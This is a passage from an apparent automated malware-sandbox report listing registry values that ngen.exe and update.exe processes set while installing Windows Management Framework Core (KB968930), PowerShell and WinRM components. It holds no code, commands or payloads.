"RootstoreDirty" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Management.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Management.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Scenario" = "32"

The process ngen.exe:3660 makes changes in the system registry.


The Malware creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "45 A7 3B 9E 7C F0 6E 09 E0 7C 16 F3 F3 89 E3 DB"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots]
"WorkPending" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\System.Management.Automation,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "3"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\System.Management.Automation,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "2"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\System.Management.Automation,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Scenario" = "32"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\System.Management.Automation,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority" = "1"

The process ngen.exe:3748 makes changes in the system registry.


The Malware creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "E5 E8 BC 6F 65 B5 86 3E 90 1F 35 BC 36 9A A0 F6"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.WSMan.Runtime,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Scenario" = "32"
"Status" = "2"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.WSMan.Runtime,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority" = "1"
"Status" = "3"

The process ngen.exe:3728 makes changes in the system registry.


The Malware creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "11 2C 1F 94 8F 3D C4 24 9B 61 66 F8 9E 4C 47 21"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Security,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Security,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "2"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Security,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "3"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Security,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Scenario" = "32"

The process ngen.exe:3720 makes changes in the system registry.


The Malware creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "11 BA 15 9B F5 33 58 69 E7 F8 FA 11 25 AE D8 66"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Utility,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Scenario" = "32"
"Status" = "2"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Utility,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "3"
"Priority" = "1"

The process ngen.exe:3704 makes changes in the system registry.


The Malware creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "D1 24 4E 6D D4 4F 47 E2 B0 1A CC 7E B5 98 BB 60"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Management,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Scenario" = "32"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Management,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Management,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "3"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Management,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "2"

The process ngen.exe:1848 makes changes in the system registry.


The Malware creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "00 A6 F0 A0 53 7C 51 A1 FC 6C 83 A0 A0 B0 45 32"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Editor,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Editor,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "2"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Editor,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "3"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Editor,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Scenario" = "32"

The process ngen.exe:3784 makes changes in the system registry.


The Malware creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "67 FB D9 15 85 D7 7C A6 55 48 56 88 A1 F5 60 49"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\System.Management.Automation.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\System.Management.Automation.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "2"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\System.Management.Automation.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "3"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\System.Management.Automation.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Scenario" = "32"

The process ngen.exe:3684 makes changes in the system registry.


The Malware creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "E2 5A 2D 3E 6E 37 9F D9 66 53 42 56 8F 37 0D BC"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.ConsoleHost,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "3"
"Priority" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.ConsoleHost,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Scenario" = "32"
"Status" = "2"

The process ngen.exe:3840 makes changes in the system registry.


The Malware creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "01 94 58 46 9B F9 3F 34 37 F6 19 22 4D 1D 67 ED"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Diagnostics.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "2"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Diagnostics.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Diagnostics.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Scenario" = "32"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Diagnostics.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "3"

The process ngen.exe:1532 makes changes in the system registry.


The Malware creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "4A AC 9A E5 62 E0 F9 B6 37 CC 36 8A D8 E8 ED 6B"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.GPowerShell,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.GPowerShell,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "3"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.GPowerShell,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Scenario" = "32"
"Status" = "2"

The process ngen.exe:3848 makes changes in the system registry.


The Malware creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "1D 48 19 34 F1 C8 1A 75 2E 7F 83 A1 2A 2A 96 48"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.WSMan.Management.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "2"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.WSMan.Management.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.WSMan.Management.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "3"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.WSMan.Management.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Scenario" = "32"

The process ngen.exe:1740 makes changes in the system registry.


The Malware creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "80 B1 9C BE 5A 84 29 81 44 F4 0E 16 13 A6 6A 7D"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.GraphicalHost,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "3"
"Priority" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.GraphicalHost,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "2"
"Scenario" = "32"

The process update.exe:1988 makes changes in the system registry.


The Malware creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllVerifyIndirectData\{603BCC1F-4B59-4E08-B724-D2C6297EF351}]
"(Default)" = ""

[HKLM\SOFTWARE\Microsoft\Updates\KB968930\SP10\KB968930]
"Description" = "Windows Management Framework Core"

[HKCR\CLSID\{BA9BB214-D930-4206-8F8F-BF0F1EAA4A6B}\InprocServer32]
"ThreadingModel" = "Both"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN]
"StackVersion" = "2.0"

[HKCR\Microsoft.PowerShellModule.1\shell\Open\command]
"(Default)" = "%System%\notepad.exe %1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\MSMQ]
"ControlFlags" = "1"

[HKCR\.psc1]
"(Default)" = "Microsoft.PowerShellConsole.1"

[HKCR\Interface\{BA9BB214-D930-4206-8F8F-BF0F1EAA4A6B}]
"(Default)" = "IWSManHostEntrySink"

[HKCR\CLSID\{F73C1438-71B4-4D91-AD13-1F889A03AC67}\InprocServer32]
"ThreadingModel" = "Both"

[HKLM\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllGetSignedDataMsg\{603BCC1F-4B59-4E08-B724-D2C6297EF351}]
"FuncName" = "PsGetSignature"

[HKLM\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllRemoveSignedDataMsg\{603BCC1F-4B59-4E08-B724-D2C6297EF351}]
"DLL" = "%System%\WindowsPowerShell\v1.0\pwrshsip.dll"

[HKCR\CLSID\{BCED617B-EC03-420b-8508-977DC7A686BD}\Typelib]
"(Default)" = "{F010BE25-296D-4036-980F-5A0669A17577}"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"

[HKCR\CLSID\{7DE087A5-5DCB-4df7-BB12-0924AD8FBD9A}\Typelib]
"(Default)" = "{F010BE25-296D-4036-980F-5A0669A17577}"

[HKLM\SOFTWARE\Microsoft\PowerShell\1\PowerShellEngine]
"PSCompatibleVersion" = "1.0,2.0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\KB968930]
"NoModify" = "1"

[HKCR\Interface\{F3457CA9-ABB9-4FA5-B850-90E8CA300E7F}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\Interface\{FC84FC58-1286-40C4-9DA0-C8EF6EC241E0}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\AppID\{3feb2f63-0eec-4b96-84ab-da1307e0117c}]
"(Default)" = "Microsoft Windows WSMan Provider Host"

[HKLM\System\CurrentControlSet\Services\Eventlog\System\KB968930]
"TypesSupported" = "7"

[HKCR\Microsoft.PowerShellModule.1]
"EditFlags" = "131072"

[HKCR\WSMan.InternalAutomation\CurVer]
"(Default)" = "WSMan.InternalAutomation.1"

[HKCR\Interface\{A7A1BA28-DE41-466A-AD0A-C4059EAD7428}]
"(Default)" = "IWSManResourceLocator"

[HKCR\.ps1xml]
"PerceivedType" = "Text"

[HKCR\Interface\{F704E861-9E52-464F-B786-DA5EB2320FDD}]
"(Default)" = "IWSManConnectionOptions"

[HKLM\System\CurrentControlSet\Services\Eventlog\Windows PowerShell\PowerShell]
"CategoryCount" = "8"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\MSMQ\Regular]
"BitNames" = " rsError rsWarning rsTrace rsNone"

[HKCR\TypeLib\{F010BE25-296D-4036-980F-5A0669A17577}\1.0\FLAGS]
"(Default)" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Setup]
"LogLevel" = "536870912"

[HKLM\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllPutSignedDataMsg\{603BCC1F-4B59-4E08-B724-D2C6297EF351}]
"DLL" = "%System%\WindowsPowerShell\v1.0\pwrshsip.dll"

[HKCR\Microsoft.PowerShellScript.1]
"EditFlags" = "131072"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SvcHost]
"WINRM" = "WINRM"

[HKCR\Interface\{EFFAEAD7-7EC8-4716-B9BE-F2E7E9FB4ADB}\TypeLib]
"(Default)" = "{F010BE25-296D-4036-980F-5A0669A17577}"

[HKLM\System\CurrentControlSet\Services\Eventlog\Windows PowerShell]
"file" = "%WinDir%\System32\config\WindowsPowerShell.evt"

[HKLM\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllIsMyFileType2\{603BCC1F-4B59-4E08-B724-D2C6297EF351}]
"DLL" = "%System%\WindowsPowerShell\v1.0\pwrshsip.dll"

[HKCR\Microsoft.PowerShellScript.1\shell\Run with PowerShell\command]
"(Default)" = "%System%\WindowsPowerShell\v1.0\powershell.exe -file %1"

[HKCR\AppID\{3e5ca495-8d6a-4d1f-ad99-177b426c8b8e}]
"LaunchPermission" = "01 00 04 80 98 00 00 00 A4 00 00 00 00 00 00 00"

[HKLM\System\CurrentControlSet\Services\Eventlog\System\WinRM]
"EventMessageFile" = "%systemroot%\system32\WsmRes.dll"

[HKCR\CLSID\{9678f47f-2435-475c-b24a-4606f8161c16}\LocalServer32]
"ServerExecutable" = "%System%\wsmprovhost.exe"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Setup\Oc Manager\TemporaryData\7c4:b0b50\iis]
"PathScripts" = "C:\Inetpub\iissamples\Scripts"

[HKLM\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllPutSignedDataMsg\{603BCC1F-4B59-4E08-B724-D2C6297EF351}]
"(Default)" = ""

[HKCR\CLSID\{047DEC5A-95C1-4C86-827F-7B8C92EBA67A}\InprocServer32]
"(Default)" = "%System%\winrssrv.dll"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

[HKLM\System\CurrentControlSet\Control\Session Manager\Environment]
"PSModulePath" = "%System%\WindowsPowerShell\v1.0\Modules\"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SvcHost\WINRM]
"CoInitializeSecurityParam" = "1"

[HKLM\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell]
"Path" = "%System%\WindowsPowerShell\v1.0\powershell.exe"

[HKCR\Microsoft.PowerShellConsole.1]
"FriendlyTypeName" = "Windows PowerShell Console File"

[HKCR\Microsoft.PowerShellModule.1\shell\Edit\command]
"(Default)" = "%System%\WindowsPowerShell\v1.0\powershell_ise.exe %1"

[HKCR\WSMan.InternalAutomation]
"(Default)" = "WSMan InternalAutomation Class"

[HKCR\Microsoft.PowerShellData.1]
"FriendlyTypeName" = "Windows PowerShell Data File"

[HKCR\CLSID\{9678f47f-2435-475c-b24a-4606f8161c16}\LocalServer32]
"(Default)" = "%System%\wsmprovhost.exe"

[HKCR\TypeLib\{F010BE25-296D-4036-980F-5A0669A17577}\1.0]
"(Default)" = "Microsoft WSMAN Automation V1.0 Library"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SvcHost\WINRM]
"AuthenticationCapabilities" = "12320"

[HKCR\Interface\{A7A1BA28-DE41-466A-AD0A-C4059EAD7428}\TypeLib]
"Version" = "1.0"

[HKLM\System\CurrentControlSet\Services\Eventlog\Microsoft-Windows-Forwarding/Operational]
"Retention" = "0"

[HKLM\System\CurrentControlSet\Services\Eventlog\System\KB968930]
"EventMessageFile" = "%SystemRoot%\System32\spmsg.dll"

[HKCR\CLSID\{BA9BB214-D930-4206-8F8F-BF0F1EAA4A6B}]
"(Default)" = "PSFactoryBuffer"

[HKLM\SOFTWARE\Microsoft\Updates\KB968930\SP10\KB968930]
"PublishingGroup" = "Management and Infrastructure Group"

[HKCR\Microsoft.PowerShellConsole.1\shell\open\command]
"(Default)" = "%System%\WindowsPowerShell\v1.0\powershell.exe -p %1"

[HKLM\System\CurrentControlSet\Services\Eventlog\Windows PowerShell]
"Retention" = "0"

[HKLM\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllPutSignedDataMsg\{603BCC1F-4B59-4E08-B724-D2C6297EF351}]
"FuncName" = "PsPutSignature"

[HKLM\System\CurrentControlSet\Services\Eventlog\System\WinRM]
"ParameterMessageFile" = "%systemroot%\system32\kernel32.dll"

[HKCR\Interface\{17245DB2-74E5-45F6-8843-B7AEF309B6D6}\NumMethods]
"(Default)" = "6"

[HKLM\System\CurrentControlSet\Services\WinRM]
"DependOnService" = "RPCSS, HTTP, HTTPFilter"

[HKLM\System\CurrentControlSet\Services\Eventlog\System\WinRM]
"TypesSupported" = "7"

[HKCR\Interface\{2D53BDAA-798E-49E6-A1AA-74D01256F411}]
"(Default)" = "IWSManEx"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\KB968930]
"TSAware" = "1"

[HKCR\Interface\{190D8637-5CD3-496D-AD24-69636BB5A3B5}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\AppID\{3e5ca495-8d6a-4d1f-ad99-177b426c8b8e}]
"(Default)" = "Microsoft Windows Remote Shell Host"

[HKLM\SOFTWARE\Microsoft\Updates\KB968930\SP10\KB968930]
"UninstallCommand" = "%WinDir%\$968930Uinstall_KB968930$\spuninst\spuninst.exe"

[HKCR\CLSID\{BCED617B-EC03-420b-8508-977DC7A686BD}\InprocServer32]
"(Default)" = "%System%\WSMAUTO.DLL"

[HKCR\CLSID\{f4f7d085-cd01-43f9-899d-179c6df5ddad}\InprocServer32]
"ThreadingModel" = "Both"

[HKLM\SOFTWARE\Microsoft\PowerShell\1\PowerShellEngine]
"ConsoleHostModuleName" = "%System%\WindowsPowerShell\v1.0\Microsoft.PowerShell.ConsoleHost.dll"

[HKCR\WSMan.Automation\CLSID]
"(Default)" = "{BCED617B-EC03-420b-8508-977DC7A686BD}"

[HKCR\WSMan.Automation.1\CLSID]
"(Default)" = "{BCED617B-EC03-420b-8508-977DC7A686BD}"

[HKLM\System\CurrentControlSet\Services\WinRM]
"Type" = "32"

[HKLM\System\CurrentControlSet\Services\Eventlog\Microsoft-Windows-Forwarding/Operational\EventForwarder-Operational]
"EventMessageFile" = "%systemroot%\system32\wevtfwd.dll"

[HKCR\CLSID\{BCED617B-EC03-420b-8508-977DC7A686BD}\VersionIndependentProgID]
"(Default)" = "WSMan.Automation"

[HKCR\Interface\{F704E861-9E52-464F-B786-DA5EB2320FDD}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKLM\System\CurrentControlSet\Services\WinRM]
"DisplayName" = "Windows Remote Management (WS-Management)"

[HKCR\Interface\{190D8637-5CD3-496D-AD24-69636BB5A3B5}\TypeLib]
"Version" = "1.0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Setup\Oc Manager\TemporaryData\7c4:b0b50\iis]
"IISProgramGroup" = "Microsoft Internet Information Services"

[HKCR\TypeLib\{F010BE25-296D-4036-980F-5A0669A17577}\1.0\0\win32]
"(Default)" = "%System%\WsmAuto.dll"

[HKCR\Microsoft.PowerShellConsole.1]
"EditFlags" = "131072"

[HKLM\SOFTWARE\Microsoft\Updates\KB968930\SP10\KB968930]
"InstalledDate" = "3/2/2016"
"ReleaseType" = "Software Update"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"

[HKCR\WSMan.InternalAutomation.1\CLSID]
"(Default)" = "{7DE087A5-5DCB-4df7-BB12-0924AD8FBD9A}"

[HKCR\WSMan.Automation\CurVer]
"(Default)" = "WSMan.Automation.1"

[HKCR\CLSID\{7DE087A5-5DCB-4df7-BB12-0924AD8FBD9A}\ProgID]
"(Default)" = "WSMan.InternalAutomation.1"

[HKCR\.ps1xml]
"(Default)" = "Microsoft.PowerShellXmlData.1"

[HKCR\Interface\{BA9BB214-D930-4206-8F8F-BF0F1EAA4A6B}\NumMethods]
"(Default)" = "4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Setup\Oc Manager\TemporaryData\7c4:b0b50\iis]
"PathIISHelp" = "%WinDir%\Help\iishelp"

[HKCR\Interface\{2D53BDAA-798E-49E6-A1AA-74D01256F411}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKLM\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllVerifyIndirectData\{603BCC1F-4B59-4E08-B724-D2C6297EF351}]
"DLL" = "%System%\WindowsPowerShell\v1.0\pwrshsip.dll"

[HKLM\System\CurrentControlSet\Services\WinRM]
"ImagePath" = "%WinDir%\System32\svchost.exe -k WinRM"

[HKLM\SYSTEM\LastKnownGoodRecovery\LastGood]
"INF/oem10.PNF" = "1"

[HKLM\System\CurrentControlSet\Services\Eventlog\Windows PowerShell]
"MaxSize" = "15728640"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Setup\Oc Manager\TemporaryData\7c4:b0b50\iis]
"UpgradeType" = "0"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "99 D0 24 6A 1F 86 A6 D3 11 F1 17 C4 DD E0 19 36"

[HKCR\CLSID\{F73C1438-71B4-4D91-AD13-1F889A03AC67}]
"(Default)" = "PSFactoryBuffer"

[HKCR\Interface\{A7A1BA28-DE41-466A-AD0A-C4059EAD7428}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\CLSID\{047DEC5A-95C1-4C86-827F-7B8C92EBA67A}]
"(Default)" = "PSFactoryBuffer"

[HKLM\System\CurrentControlSet\Services\Eventlog\Windows PowerShell]
"Sources" = "PowerShell"

[HKCR\AppID\{3feb2f63-0eec-4b96-84ab-da1307e0117c}]
"LaunchPermission" = "01 00 04 80 98 00 00 00 A4 00 00 00 00 00 00 00"

[HKCR\Interface\{FC84FC58-1286-40C4-9DA0-C8EF6EC241E0}\TypeLib]
"(Default)" = "{F010BE25-296D-4036-980F-5A0669A17577}"

[HKLM\System\CurrentControlSet\Services\Eventlog\Microsoft-Windows-Forwarding/Operational]
"MaxSize" = "20971520"

[HKLM\System\CurrentControlSet\Services\WinRM\Parameters]
"ServiceDll" = "%SystemRoot%\system32\WsmSvc.dll"

[HKLM\SOFTWARE\Microsoft\PowerShell\1\1033]
